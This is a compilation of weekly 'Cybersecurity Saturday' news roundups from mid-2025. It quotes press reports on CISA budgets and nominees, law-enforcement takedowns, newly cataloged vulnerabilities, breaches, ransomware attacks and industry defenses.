Cybersecurity Saturday

Cybersecurity

Cybersecurity Saturday

David ErmerCybersecurity, Generative AI

From the cybersecurity and law enforcement front,

  • Cyberscoop reports,
    • “A House panel approved a fiscal 2026 funding bill Monday [June 9, 2025] that would cut the Cybersecurity and Infrastructure Security Agency by $135 million from fiscal 2025, significantly less than the Trump administration’s proposed $495 million.
    • “The chairman of the House Appropriations Subcommittee on Homeland Security, Rep. Mark Amodei, said the annual Department of Homeland Security funding measure “responsibly trimmed” the CISA budget. But Illinois Rep. Lauren Underwood, the top Democrat on his panel, said the legislation “fails to address the catastrophic cybersecurity threats facing our critical infrastructure.”
    • “The subcommittee approved the bill by a vote of 8-4.
    • “CISA would get $2.7 billion under the measure, according to a committee fact sheet, or $134.8 million less than the prior year.
    • “While the full committee chairman Tom Cole, R-Okla., said “the bill provides critical support for cybersecurity technology,” Republicans also criticized the agency’s past work.”
  • and
    • “A familiar face is being promoted from within to lead the FBI’s Cyber division.
    • “In a LinkedIn post Sunday [June 8, 2025], Brett Leatherman said that FBI Director Kash Patel had selected him as assistant director and lead official for the FBI’s primary division for investigating cybercrimes.  The role is prominent in national security, espionage and counterintelligence investigations.” * * *
    • “Leatherman takes over the reins from Bryan Vorndran, who led the bureau’s Cyber Division from 2021 until this past spring when he left the federal government to take a job as Microsoft’s deputy chief information security officer.”  
  • The National Institute of Standards and Technology (NIST) illustrates “19 Ways to Build Zero Trust Architectures.”
    • “The traditional approach to cybersecurity, built around the idea of solely securing a perimeter, has given way to the zero-trust approach of continuously evaluating and verifying requests for access.
    • “Zero trust architectures can help organizations protect far-flung digital resources from cyberattacks, but building and implementing the right architectures can be a complex undertaking.
    • “New NIST guidance offers 19 example zero trust architectures using off-the-shelf commercial technologies, giving organizations valuable starting points for building their own architectures.”
  • Cyberscoop points out,
    • “Federal authorities on Wednesday [June 11, 2025] announced the seizure of about 145 domains and cryptocurrency funds linked to BidenCash, a cybercrime marketplace for stolen credit cards, compromised credentials and other personal information. 
    • “BidenCash was used by more than 117,000 customers, resulting in the trafficking of more than 15 million credit card numbers and personally identifiable information, the Justice Department said. Administrators of the cybercrime platform, which charged a per-transaction fee, generated more than $17 million in illicit revenue since its formation in March 2022, authorities said.
    • “Domains associated with BidenCash now redirect to a server controlled by U.S. law enforcement and display seizure notices. The U.S. Attorney’s Office for the Eastern District of Virginia, which is leading the case, said it seized cryptocurrency funds the BidenCash marketplace used to receive illicit proceeds from its operations.
    • “Authorities did not disclose the value of those seized cryptocurrency funds or identify the physical location of the administrators and infrastructure used by BidenCash. The U.S. Attorney’s Office for the Eastern District of Virginia did not immediately respond to questions.” 
  • Cybersecurity Dive adds,
    • “An international law enforcement operation has dismantled the computer infrastructure powering multiple strains of information-stealer malware.
    • “As part of “Operation Secure,” authorities in 26 Asian countries “worked to locate servers, map physical networks and execute targeted takedowns,” Interpol said in a statement. Law enforcement agencies worked with cybersecurity firms Group-IB, Kaspersky and Trend Micro to prepare assessments of their targets and shared that information with “cyber teams across Asia,” according to Interpol, resulting in “in the takedown of 79 percent of identified suspicious IP addresses.”

From the cybersecurity vulnerabilities and breaches front,

  • The Wall Street Journal reports,
    • “Supermarket shelves are emptying out at some stores around the country, after a cyberattack hit a major distributor to Whole Foods Market and other chains.
    • United Natural Foods said it detected unauthorized activity on its systems last week and took certain ones offline proactively.
    • “Disruptions to its operations have followed, United Natural said. Stores around the country have reported being unable to place orders. The company has told suppliers that it hopes to restore normal operations by Sunday, according to a notice viewed by The Wall Street Journal.” 
  • CISA added four known exploited vulnerabilities to its catalog this week.
    • June 9, 2025
      • CVE-2025-32433 Erlang Erlang/OTP SSH Server Missing Authentication for Critical Function Vulnerability 
      • CVE-2024-42009 RoundCube Webmail Cross-Site Scripting Vulnerability” 
        • The Hacker News discusses these KVEs here.
    • June 10, 2025
      • CVE-2025-24016 Wazuh Server Deserialization of Untrusted Data Vulnerability
      • CVE-2025-33053 Web Distributed Authoring and Versioning (WebDAV) External Control of File Name or Path Vulnerability”
        • Akamai discusses the “Wasuh Server” KVE here.
        • Security Week discusses the WebDAV KVE here.
  • Cybersecurity Dive adds,
    • “Government agencies are operating with massive amounts of “security debt” — meaning unresolved vulnerabilities — putting them and the public at increased risk of falling victim to hackers, according to a Veracode report released Wednesday [June 11, 2025]. 
    • “Roughly 80% of government agencies have software vulnerabilities that have gone unaddressed for at least a year, and roughly 55% of them have long-standing software flaws that place them at even greater risk, the report found.
    • “Veracode’s research shows that it takes government agencies an average of 315 days to resolve half of their software vulnerabilities, compared to the combined public- and private-sector average of 252 days.
    • “But companies and agencies alike are falling short of the necessary investments and procedures to address insecure software, according to Veracode.”
  • Dark Reading warns
    • “Secure Shell (SSH) keys are the backbone of secure remote access. They are everywhere, powering DevOps pipelines, enabling server management, and automating everything from deployments to patching. But despite their ubiquity, SSH keys often remain a blind spot in enterprise security. Why? Because unlike passwords, they don’t expire. They are easy to create, hard to track, and alarmingly simple to forget.
    • “In large enterprises, it is not uncommon to find hundreds of thousands or even millions of unmanaged SSH keys. Many of these grant access to sensitive systems but lack clear ownership or life-cycle oversight, turning what should be a secure authentication method into a major risk factor.
    • “If your organization cannot answer “Who can log in to what, using which key?” you are flying blind.”
  • Security Week notes,
    • “More than 40,000 security cameras worldwide are exposed to the internet, cybersecurity firm Bitsight warns.
    • “Operating over HTTP or RTSP (Real-Time Streaming Protocol), the cameras expose their live feed to anyone knowing their IP addresses, directly from the web browser, which makes them unintended tools for cyberattacks, espionage, extortion, and stalking, the company says.
    • “The HTTP-based cameras rely on standard web technologies for video transmission and control and are typically found in homes and small offices.
    • “Of the more than 40,000 cameras exposing their live feed, more than 14,000 are in the US, with Japan ranking second, at roughly 7,000 devices. Austria, Czechia, and South Korea have roughly 2,000 exposed cameras each, while Germany, Italy, and Russia have roughly 1,000 each.
    • “In the US, most of the exposed cameras are in California and Texas, followed by Georgia, New York, and Missouri. Massachusetts and Florida have high concentrations of exposed cameras as well.” * * *
    • “To keep these security cameras protected, users should secure their internet connections, replace default credentials, disable remote access if not needed, keep the devices always updated, and monitor them for unusual login attempts.”
  • and
    • “Trend Micro has released patches for ten vulnerabilities in Apex Central and Endpoint Encryption (TMEE) PolicyServer, including critical-severity flaws leading to remote code execution (RCE).
    • “The update for Apex Central resolves two critical bugs leading to RCE, tracked as CVE-2025-49219 and CVE-2025-49220 (CVSS score of 9.8). The security defects are similar, but were discovered in different methods, the company says.
    • “Both vulnerabilities are described as an insecure deserialization operation that could allow remote attackers to execute arbitrary code on affected installations, without authentication.
    • “Endpoint Encryption PolicyServer received fixes for eight flaws, including four critical and four high-severity defects.”
  • Per Bleeping Computer,
    • “Cloudflare has confirmed that the massive service outage yesterday was not caused by a security incident, and no data has been lost.
    • “The issue has been largely mitigated. It started 17:52 UTC yesterday [June 12, 2025] when the Workers KV (Key-Value) system went completely offline, causing widespread service losses across multiple edge computing and AI services.
    • “Workers KV is a globally distributed, consistent key-value store used by Cloudflare Workers, the company’s serverless computing platform. It is a fundamental piece in many Cloudflare services, and a failure can cause cascading issues across many components.”
    • “The disruption also impacted other services used by millions, most notably the Google Cloud Platform.”

From the ransomware front,

  • The HIPAA Journal informs us,
    • “It has taken three weeks, but Kettering Health has confirmed that it has resumed normal operations for key services following its May 20, 2025, Interlock ransomware attack. Kettering Health has been releasing regular updates on the progress being made restoring its systems, confirming that the core components of its Epic EHR system were restored on the morning on June 2, 2025, which allowed patient data to be entered, and the backlog of data recorded on paper to start to be entered into patient records.
    • “Interlock’s access to its network and system was immediately terminated when the attack was discovered, and Kettering Health confirmed on June 5, 2025, that all of the ransomware group’s tools and persistence mechanisms had been eradicated from its systems. Kettering Health also confirmed that all systems were fully up to date with the latest versions of software installed and patches applied, and security enhancements had been implemented, including network segmentation, enhanced monitoring, and updated access controls. Kettering Health said it is confident that its cybersecurity framework and employee security training are sufficient to mitigate future risks.”
  • Cybersecurity Dive reports,
    • “Ransomware gangs have exploited a vulnerability in the SimpleHelp remote support program to breach customers of a utility billing software vendor, the Cybersecurity and Infrastructure Security Agency (CISA) warned on Thursday [June 12, 2025].
    • “The government advisory follows an earlier warning from CISA and the FBI that hackers associated with the Play ransomware gang had been targeting critical infrastructure organizations using the flaw in SimpleHelp’s remote management software.
    • “The new CISA alert highlights the risks of vendors not verifying the security of their software before providing it to customers.” * * *
    • “In its Thursday alert, CISA said the breach of the utility payment vendor reflected a “broader pattern” of such attacks.
    • “The agency urged “software vendors, downstream customers, and end users to immediately implement the Mitigations listed in this advisory based on confirmed compromise or risk of compromise.” 
    • “Vendors should isolate vulnerable SimpleHelp instances, update the software and warn customers, according to CISA, while customers should determine whether they are running the SimpleHelp endpoint service, isolate and update those systems and follow SimpleHelp’s additional guidance.’
  • Per Bleeping Computer,
    • “Fog ransomware hackers are using an uncommon toolset, which includes open-source pentesting utilities and a legitimate employee monitoring software called Syteca.
    • “The Fog ransomware operation was first observed last year in May leveraging compromised VPN credentials to access victims’ networks.
    • ‘Post-compromise, they used “pass-the-hash” attacks to gain admin privileges, disabled Windows Defender, and encrypted all files, including virtual machine storage.
    • “Later, the threat group was observed exploiting n-day flaws impacting Veeam Backup & Replication (VBR) servers, as well as SonicWall SSL VPN endpoints.”

From the cybersecurity defenses front,

  • Cybersecurity Dive lets us know,
    • “The threat of cyberattacks represents the most serious challenge for businesses in the coming year, the advisory firm Kroll said in a report published Thursday [June 12, 2025].
    • “Roughly three-quarters of respondents said their cybersecurity and privacy concerns had increased over the past year, with nearly half citing malware and more than a third citing data extortion as specific fears.
    • “Kroll’s survey of 1,200 respondents from more than 20 countries, conducted in February, provides some measure of how businesses are thinking about and dealing with cyber worries as global tensions escalate.”
  • and
    • “Artificial intelligence is poised to transform the work of security operations centers, but experts say humans will always need to be involved in managing companies’ responses to cybersecurity incidents — as well as policing the autonomous systems that increasingly assist them.
    • “AI agents can automate many repetitive and complex SOC tasks, but for the foreseeable future, they will have significant limitations, including an inability to replicate unique human knowledge or understand bespoke network configurations, according to experts who presented here at the Gartner Security and Risk Management Summit.
    • “The promise of AI dominated this year’s Gartner conference, where experts shared how the technology could make cyber defenders’ jobs much easier, even if it has a long way to go before it can replace experienced humans in a SOC.
    • “As the speed, the sophistication, [and] the scale of the attacks [go] up, we can use agentic AI to help us tackle those challenges,” Hammad Rajjoub, director of technical product marketing at Microsoft, said during his presentation. “What’s better to defend at machine speed than AI itself?”
  • Dark Reading explains “Why CISOs Must Align Business Objectives & Cybersecurity. This alignment makes a successful CISO, but creating the same sentiment across business leadership creates a culture of commitment and greatly contributes to achieving goals.”
  • Here is a link to Dark Reading’s CISO Corner.

Cybersecurity Saturday

David ErmerCybersecurity, Generative AI

From the cybersecurity policy and law enforcement front,

  • Yesterday, the President issued a cybersecurity executive order. Here is a link to related fact sheet.
  • Federal News Network adds,
    • “President Donald Trump has signed a new cybersecurity executive order that continues many of the policies of his predecessors, while also marking out some key changes in the approach to software security, digital identity and more.
    • “The new executive order, “Sustaining Select Efforts to Strengthen the Nation’s Cybersecurity,” modifies many aspects of a cyber EO signed by President Joe Biden in January. It also makes changes to executive orders signed by President Barack Obama to focus federal cybersecurity law enforcement efforts on foreign nationals.
    • “But Trump’s new EO continues key aspects Biden directives, including an effort to strengthen the Cybersecurity and Infrastructure Security Agency’s role in defending civilian federal networks.” * * *
    • “The latest cybersecurity executive order also maintains federal efforts around post-quantum cryptography, Border Gateway Protocol, and advanced encryption.
    • “But it eliminates the January order’s directive for agencies to require federal software vendors to provide evidence of following secure development practices.
    • “Instead, Trump directs the National Institute of Standards and Technology to establish a new consortium with industry “that demonstrates the implementation of secure software development, security, and operations practices” based on NIST’s Secure Software Development Framework.”
  • Per Cybersecurity Dive,
    • “Trump’s elimination of Biden’s software security requirements for federal contractors represents a significant government reversal on cyber regulation. Following years of major cyberattacks linked to insecure software, the Biden administration sought to use federal procurement power to improve the software industry’s practices. That effort began with Biden’s 2021 cyber order and gained strength in 2024, and then Biden officials tried to add teeth to the initiative before leaving office in January. But as it eliminated that project on Friday, the Trump administration castigated Biden’s efforts as “imposing unproven and burdensome software accounting processes that prioritized compliance checklists over genuine security investments.”
    • “Trump’s order eliminates provisions from Biden’s directive that would have required federal contractors to submit “secure software development attestations,” along with technical data to back up those attestations. Also now eradicated are provisions that would have required the Cybersecurity and Infrastructure Security Agency to verify vendors’ attestations, required the Office of the National Cyber Director to publish the results of those reviews and encouraged ONCD to refer companies whose attestations fail a review to the Justice Department “for action as appropriate.”
  • Cyberscoop reports,
    • “Sean Cairncross laid out his vision to senators Thursday for the Office of the National Cyber Director if he is confirmed to lead it.
    • “A goal of mine is to make sure this office sits at the place that this committee and I believe Congress intended in the statute, and that is to lead cyber policy coordination across the federal government,” he told the Homeland Security and Governmental Affairs Committee at his confirmation hearing.
    • “In doing that, working with our interagency partners is vital,” he said. “We’ve been empowered to work with [the Office of Management and Budget] to ensure that budget alignment among the interagency aligns with administration policy, and I think those tools have to be leveraged, and relationships between us and the interagency — it’s making sure that it is monitored and enforced.”
  • Cybersecurity Dive adds,
    • “Two coalitions of cybersecurity companies, professional associations and experts have endorsed Sean Plankey and Sean Cairncross, President Donald Trump’s nominees to serve as director of the Cybersecurity and Infrastructure Security Agency and national cyber director, respectively.
    • “Plankey and Cairncross’s backers include executives at cybersecurity firms, former senior government officials from administrations of both parties and leaders of trade groups and think tanks.”
  • Per Bleeping Computer,
    • “The U.S. Department of State has announced a reward of up to $10 million for any information on government-sponsored hackers with ties to the RedLine infostealer malware operation and its suspected creator, Russian national Maxim Alexandrovich Rudometov.
    • “The same bounty covers leads on state hackers’ use of this malware in cyber operations targeting critical infrastructure organizations in the United States.
    • “This bounty is posted as part of the Department of State’s Rewards for Justice program established by the 1984 Act to Combat International Terrorism, which rewards informants for tips that help identify or locate foreign government threat actors behind cyberattacks against U.S. entities.”
  • Per Cyberscoop,
    • “Federal authorities on Thursday [June 5, 2025] said they seized $7.74 million from North Korean nationals as they attempted to launder cryptocurrency obtained by IT workers who gained illegal employment and funneled the wages to the North Korean regime.
    • “The allegedly illegally obtained funds were linked to Sim Hyon Sop, a representative of North Korean Foreign Trade Bank, and Kim Sang Man, CEO of Chinyong, an outfit associated with North Korea’s Ministry of Defense, the Justice Department said. Both North Korean nationals were added to the Treasury Department’s Office of Foreign Assets Control’s list of sanctioned individuals in 2023.
    • “The cryptocurrency seizure marks another action in a series of long-running law enforcement efforts to identify and prevent North Korean operatives from gaining employment at companies, evading U.S. sanctions, and sending payroll back to the North Korean government.”
  • Per Security Week,
    • “German authorities have named Russian national Vitaly Nikolaevich Kovalev as the founder and leader of the TrickBot cybercrime gang.”
    • “Established in 2016, the TrickBot group is believed to have infected millions of computers worldwide, exfiltrating sensitive information such as credentials, banking and credit card details, and personal information, while also enabling the deployment of other malware, such as ransomware.
    • “Authorities targeted TrickBot’s infrastructure in takedown attempts in 2020 and 2024 and announced charges and sanctions against over a dozen group members in 2023, including Kovalev, believed at the time to be a senior figure within the cybercrime ring.”

From the cybersecurity vulnerabilities and breaches front,

  • CISA added nine known exploited vulnerabilities to its catalog this week.
  • Bleeping Computer tells us,
    • “A threat actor has re-released data from a 2021 AT&T breach affecting 70 million customers, this time combining previously separate files to directly link Social Security numbers and birth dates to individual users.
    • “AT&T told BleepingComputer that they are investigating the data but also believe it originates from the known breach and was repackaged into a new leak.
    • “It is not uncommon for cybercriminals to repackage previously disclosed data for financial gain. We just learned about claims that AT&T data is being made available for sale on dark web forums, and we are conducting a full investigation,” AT&T told BleepingComputer.”
  • andD
    • “Cisco has released patches to address three vulnerabilities with public exploit code in its Identity Services Engine (ISE) and Customer Collaboration Platform (CCP) solutions.
    • “The most severe of the three is a critical static credential vulnerability tracked as CVE-2025-20286, found by GMO Cybersecurity’s Kentaro Kawane in Cisco ISE. This identity-based policy enforcement software provides endpoint access control and network device administration in enterprise environments.
    • “The vulnerability is due to improperly generated credentials when deploying Cisco ISE on cloud platforms, resulting in shared credentials across different deployments.”
  • Dark Reading informs us,
    • “ClickFix campaigns are gaining steam according to various security researchers, with recent campaigns spotted across the globe from a wide swath of cyberattackers. The increasingly popular tactic represents a significant new evolution for social engineering, researchers say — and enterprises need to take note.
    • “ClickFix activity has been snowballing: Darktrace said yesterday that it recently identified multiple ClickFix attacks across customer environments in Europe, the Middle East, and Africa (EMEA), and in the United States; while SlashNext, in a separate report, detailed an unusual version of the attack vector that impersonates Cloudflare Turnstile, which is the Web protection company’s CAPTCHA-like Turing test. Also, this week, Cofense outlined a campaign that spoofed Booking.com CAPTCHAs, targeting hotel chains with remote access Trojans (RATs) and infostealers.”
  • and
    • The Federal Burau of Investigation (FBI) warned that cybercriminals are compromising Internet of Things (IoT) devices connected to home networks through the BADBOX 2.0 botnet.
    • The BADBOX 2.0 botnet was discovered several months ago after the original BADBOX campaign was disrupted in 2024. Human Security’s Satori Threat Intelligence and Research team, alongside Google, Trend Micro, the Shadowserver Foundation, and others, were able to partially disrupt the “complex and expansive” BADBOX 2.0 operation, noting that it remains the largest botnet of infected connected TV (CTV) devices ever uncovered.
  • Per Cybersecurity Dive,
    • “A financially motivated hacker group has been targeting Salesforce instances for months in a campaign that uses voice phishing to engage in data theft and follow-on extortion attempts, according to Google Threat Intelligence Group
    • “The hackers, whom Google tracks as UNC6040, impersonated IT workers and tricked employees at often English-speaking branches of multinational companies into sharing sensitive credentials that were then used to access the organizations’ Salesforce data, Google said in a blog post published Wednesday.
    • “As part of the social engineering campaign, the hackers tricked workers at these companies into visiting the Salesforce-connected app setup page, at which point the attackers used an unauthorized, malicious version of the Salesforce Data Loader app to access and steal sensitive information from the customers’ Salesforce environments. 
    • “Beyond the immediate data thefts, the hackers were able to move laterally within target networks, accessing victims’ other cloud services and moving into internal corporate networks.”

From the ransomware front,

  • The American Hospital Association warns,
    • “The FBI, Cybersecurity and Infrastructure Security Agency and Australian Cyber Security Centre June 4 released an advisory on updated actions and tactics used by the Play ransomware group. The group, active since 2022, has impacted a wide range of businesses and critical infrastructure in North America, South America and Europe. As of May, the FBI was aware of about 900 victims allegedly exploited by the group’s efforts.
    • “The threat actors are presumed to be a closed group, designed to “guarantee the secrecy of deals,” according to a statement on the group’s data leak website. They employ a double-extortion model that encrypts systems after exfiltrating data. Their ransom notes do not include an initial ransom demand or payment instructions. Instead, victims are instructed to contact the threat actors via email.
    • “Play ransomware was among the most active cyberthreat groups in 2024,” said Scott Gee, AHA deputy national advisor for cybersecurity and risk. “This report highlights their evolving tactics, and health care cybersecurity teams should be aware of the changes.  As threat actors shift tactics, it is critical that network defenders keep pace. The double-layered extortion model and encryption of systems, as well as theft of data, pose a serious potential risk to hospitals and the delivery of health care.”
  • Cybersecurity Dive adds,
    • “Since mid-January, multiple ransomware groups, including initial access brokers affiliated with Play, have targeted vulnerabilities in a remote support tool called SimpleHelp. Researchers disclosed those flaws in January.  
    • “The new advisory updates the government’s original December 2023 warning about the Play ransomware group, which is also known as PlayCrypt. The hackers have previously been blamed for attacks targeting ConnectWise ScreenConnect and Rackspace
    • “The recent attacks exploiting SimpleHelp involve three flaws discovered by security firm Horizon3.ai.”
  • Bleeping Computer lets us know,
    • “Healthcare giant Kettering Health, which manages 14 medical centers in Ohio, confirmed that the Interlock ransomware group breached its network and stole data in a May cyberattack.
    • “Kettering Health operates over 120 outpatient facilities and employs over 15,000 people, including over 1,800 physicians.
    • “The healthcare network noted in a Thursday statement that its network devices have been secured, and its team is now working on re-establishing communication channels with patients disrupted by the outage triggered by last month’s ransomware attack.”
  • Security Week adds,
    • “American media company Lee Enterprises revealed this week that the disruptive cyberattack it dealt with earlier this year resulted in a data breach impacting nearly 40,000 individuals.
    • “Lee Enterprises owns 350 weekly and specialty publications across 25 states, and dozens of them suffered disruptions in February as a result of a ransomware attack that involved the encryption of critical applications and the theft of files.
    • “The company informed the Maine Attorney General’s Office this week that it recently completed its investigation into the incident and determined that personal information was compromised.
    • “According to Lee Enterprises, the attackers may have obtained the information of 39,779 people, including their names and Social Security numbers.
    • “Affected individuals are being offered 12 months of free credit monitoring and identity protection services.”
  • Honeywell lets us know,
    • “In a growing wave of sophisticated cyber threats against the industrial sector, ransomware attacks jumped by 46% from Q4 2024 to Q1 2025, according to Honeywell’s new 2025 Cybersecurity Threat Report. The research also found that both malware and ransomware increased significantly in this period and included a 3,000% spike in the use of one trojan designed to steal credentials from industrial operators.”
    • “To learn more and download the full report, visit our website.”

From the cybersecurity business and defenses front,

  • Cybersecurity Dive reports,
    • “Microsoft and CrowdStrike will lead a cooperative effort to map out the overlapping web of hacker groups that their researchers have disclosed and named, the companies said on Monday. 
    • “Palo Alto Networks and Google and its Mandiant unit have also agreed to join the collaborative effort on streamlining threat group taxonomy.
    • “For years, the companies’ different naming conventions for various criminal and state-linked threat groups have created unnecessary confusion and delays in the sharing of threat intelligence.
    • “Microsoft and CrowdStrike released an initial version of their threat actor matrix on Monday, listing the groups they track and each one’s corresponding aliases from other researchers.
    • “Palo Alto Networks and Google and its Mandiant unit are joining the collaborative effort on streamlining threat group taxonomy.”
  • The Wall Street Journal reports,
    • CrowdStrike swung to a loss in the fiscal first quarter and posted a lower-than-expected outlook, as the costs of its outage last summer continue to weigh on results.
    • “The cybersecurity company said Tuesday its revenue is still being hurt by an incentive program it launched last year to try to retain customers after a widespread software outage in July.
    • “CrowdStrike had implemented a customer-commitment program, which let customers try some products for free, and was weighing on its subscription revenue. The program wrapped up at the end of fiscal-year 2025, but its effects are lingering.”
  • Dark Reading tells us,
    • F5 this week announced the acquisition of Fletch, a San Francisco-based startup with agent-based artificial intelligence (AI) technology that analyzes massive amounts of threat intelligence data and remediates the most severe vulnerabilities in real time.
    • “Terms of the deal were not disclosed, but most of Fletch’s 15 employees have joined F5, which was seeking the technology and expertise to bring agentic AI capabilities to the recently introduced F5 Application Delivery and Security Platform (ADSP).”
  • Help Net Security points out,
    • “Cybersecurity leaders and consultants identified AI-driven automation and cost optimization as top organizational priorities, according to Wipro. 
    • “30% of respondents are investing in AI automation to enhance their cybersecurity operations. AI-driven automation can help in detecting and responding to threatsmore quickly and accurately, thereby reducing the need for extensive manual intervention. 
    • ‘26% of respondents are focusing on tools rationalization. This approach involves evaluating and consolidating duplicate security tools across platforms to eliminate redundancies and improve efficiency while reducing costs. 
    • “Another significant area is security and risk management process optimization, with 23% of organizations targeting this for cost savings. Streamlining these processes can lead to more effective risk management and better allocation of resources. Apart from these priorities, 20% are focusing on simplifying operating models to achieve better visibility and faster response across reduced attack surfaces.”
  • Here is a link to Dark Reading’s CISO Corner.

Cybersecurity Saturday

David ErmerCybersecurity, Generative AI

Cybersecurity policy and law enforcement,

  • Helpnet Security tells us,
    • “NIST has introduced a new way to estimate which software vulnerabilities have likely been exploited, and it’s calling on the cybersecurity community to help improve and validate the method.
    • “The new metric, “Likely Exploited Vulnerabilities” (LEV), aims to close a key gap in vulnerability management: identifying which of the thousands of reported flaws each year are actually being used in real-world attacks.
    • “Organizations typically rely on two main tools for this: the Exploit Prediction Scoring System (EPSS), which estimates the chance of future exploitation, and Known Exploited Vulnerability (KEV) lists like the one maintained by CISA. But both have limits. EPSS is predictive and doesn’t account for past exploitation, while KEV lists are confirmed cases but often incomplete.
    • “LEV aims to bridge that gap by calculating the probability that a vulnerability has been exploited in the past, based on historical EPSS data. It’s a statistical estimate, not a confirmation, which is why the whitepaper emphasizes that LEV is meant to augment, not replace, existing methods.” * * *
    • The researchers outline four key ways LEV could be used:
      • 1. Estimate how many vulnerabilities have been exploited.
      • 2. Check how complete KEV lists are.
      • 3. Identify high-risk vulnerabilities missing from those lists.
      • 4. Fix blind spots in EPSS, which sometimes underestimates risk for already-exploited bugs.
  • Next Thursday, the Senate Homeland Security and Governmental Affairs Committee will hold a confirmation hearing for the following Department of Homeland Security nominees.
    • Sean Cairncross, of Minnesota, to be National Cyber Director, Robert Law, of the District of Columbia, to be Under Secretary for Strategy, Policy, and Plans, James Percival, of Florida, to be General Counsel, Sean Plankey, of Pennsylvania, to be Director of the Cybersecurity and Infrastructure Security Agency, and Kevin Rhodes, of Florida, to be Administrator for Federal Procurement Policy.
  • Federal News Network reports yesterday,
    • “The Trump administration is proposing to cut more than 1,000 positions at the Cybersecurity and Infrastructure Security Agency.
    • “Under the 2026 budget request, CISA would go from approximately 3,732 funded positions today to 2,649 positions next year. The staff reductions are detailed in CISA’s fiscal 2026 budget justification, posted today. They present the most detailed view yet of the Trump administration’s proposal to cut CISA’s budget by nearly $500 million.
    • “The proposed cuts still have to be approved by Congress as part of the 2026 appropriations process. But they come as hundreds of CISA employees have already left under the Trump administration. Meanwhile, more staff could depart through deferred resignations or early retirements offered to DHS staff in April.
    • “The proposed cuts are spread across CISA’s various divisions. CISA’s cybersecurity division would go from 1,267 positions to 1,063 jobs. CISA’s infrastructure security division would go from about 343 positions to 325 jobs.”
  • Dark Reading informs us,
    • “The Cybersecurity and Infrastructure Security Agency (CISA) and Australian Cyber Security Centre (ACSC) released new guidance this week on procuring, implementing, and maintaining security information and event management (SIEM) and security orchestration, automation, and response (SOAR) platforms.
    • “SIEM and SOAR help organizations collect and analyze data from firewalls, endpoints, and applications to better detect and respond to cybersecurity incidents. However, many organizations encounter significant implementation and deployment challenges, including significant costs and ongoing maintenance requirements. The guidance noted these are not “set it and forget it” tools.
    • “These platforms are becoming more essential as organizations store and manage an influx of data that is highly attractive to attackers, particularly personally identifiable information and personal health information. Additionally, increasing infrastructure complexity is creating gaps in visibility and making threat detection more difficult. There are more endpoints to secure, more applications, more third-party vendors, and more remote workers for attackers to exploit.”  
  • Per HHS Office for Civil Rights news releases,
  • and
    • “Today [May 30, 2025], the U.S. Department of Health and Human Services (“HHS”), Office for Civil Rights (“OCR”) announced a settlement with Comstar, LLC (“Comstar”), a Massachusetts company that provides billing, collection, and related services to non-profit and municipal emergency ambulance services, concerning potential violations of the Health Insurance Portability and Accountability Act of 1996 (HIPAA) Security Rule. The settlement resolves an OCR investigation concerning a ransomware breach that affected 585,621 individuals.”
    • “Under the terms of the settlement, Comstar agreed to implement a corrective action plan that OCR will monitor for two years, and paid OCR $75,000.”
    • “The resolution agreement and corrective action plan may be found at: https://www.hhs.gov/hipaa/for-professionals/compliance-enforcement/agreements/hhs-hipaa-agreement-comstar/index.html.”
       
  • Cybersecurity Dive points out,
    • “U.S. authorities on Thursday [May 28, 2025] charged 16 defendants in a massive global operation to disrupt the Russia-based cybercrime group behind the DanaBot malware. 
    • “DanaBot infected more than 300,000 computers around the world, facilitating fraud and ransomware and resulting in more than $50 million in damage, according to federal prosecutors. The U.S. coordinated with multiple foreign governments and private cybersecurity firms to dismantle the botnet operators’ infrastructure.
    • “The Department of Justice charged Aleksandr Stepanov, 39, a.k.a. “JimmBee,” with conspiracy, conspiracy to commit wire and bank fraud and additional charges. Artem Aleksandrovich Kalinkin, 34, a.k.a. “Onix,” was charged with conspiracy to gain unauthorized access to a computer to gain information and to defraud, among additional charges. 
  • Bleeping Computer lets us know,
    • The Federal Criminal Police Office of Germany (Bundeskriminalamt or BKA) claims that Stern, the leader of the Trickbot and Conti cybercrime gangs, is a 36-year-old Russian named Vitaly Nikolaevich Kovalev.
    • “The subject is suspected of having been the founder of the ‘Trickbot’ group, also known as ‘Wizard Spider,'” BKA said last week [English PDF], after another round of seizures and charges part of Operation Endgame, a joint global law enforcement action targeting malware infrastructure and the threat actors behind it.
    • “The group used the Trickbot malware as well as other malware variants such as Bazarloader, SystemBC, IcedID, Ryuk, Conti and Diavol.
    • “Kovalev is now also wanted in Germany, according to a recently issued Interpol red notice saying he was charged with being the ringleader of an unnamed criminal organization.”
  • and
    • “An international law enforcement operation has taken down AVCheck, a service used by cybercriminals to test whether their malware is detected by commercial antivirus software before deploying it in the wild.
    • “The service’s official domain at avcheck.net now displays a seizure banner with the crests of the U.S. Department of Justice, the FBI, the U.S. Secret Service, and the Dutch police (Politie).
    • “According to an announcement on the Politie website, AVCheck was one of the largest counter antivirus (CAV) services internationally, which helped cybercriminals assess the stealthiness and evasion of their malware.
    • “Taking the AVCheck service offline marks an important step in tackling organized cybercrime,” stated Politie’s Matthijs Jaspers.
    • “With this [action], we disrupt cybercriminals as early as possible in their operations and prevent victims.”
  • USA Today reports,
    • “An Iranian national pleaded guilty for his role in an international ransomware scheme that targeted the computer networks of Baltimore and other U.S. cities, disrupting services and causing tens of millions of dollars in losses, federal authorities said.
    • “Sina Gholinejad, 37, pleaded guilty May 27 to one count of computer fraud and abuse and one count of conspiracy to commit wire fraud, the Justice Department said in a news release. Gholinejad was arrested Jan. 10 at Raleigh-Durham International Airport in North Carolina, federal court records show.
    • “He faces a maximum penalty of 30 years in prison and is set to be sentenced in August, the Justice Department announced.”

From the cybersecurity vulnerabilities and breaches front,

  • Cybersecurity Dive informs us,
    • “A previously unknown team of Russian government-backed hackers is targeting critical infrastructure organizations in multiple sectors to collect intelligence for Moscow, Microsoft and the Dutch government said in separate reports published Tuesday.
    • “The group, which Microsoft calls Void Blizzard and the Dutch intelligence services call Laundry Bear, has been using stolen credentials and automated bulk-email collection from cloud services to scoop up data on NATO member states and Ukraine.
    • “Void Blizzard’s cyberespionage operations tend to be highly targeted at specific organizations of interest to the Russian government, including in government, defense, transportation, media, non-governmental organizations (NGOs), and healthcare sectors primarily in Europe and North America,” Microsoft said in a blog post.”
  • and
    • “A “highly targeted” spearphishing campaign is attempting to ensnare financial executives at banks, investment firms, energy utilities and insurance companies around the world, Trellix said in a report published Wednesday.
    • “The malicious emails are rigged with installers that allow the hackers to remotely access victim computers.
    • “With this amount of access to legitimate accounts, attackers could steal files or initiate fraudulent money transfers, potentially without raising red flags.”
  • and
    • “ConnectWise is investigating suspicious activity — likely associated with a nation-state actor — affecting a limited number of customers that use ScreenConnect. 
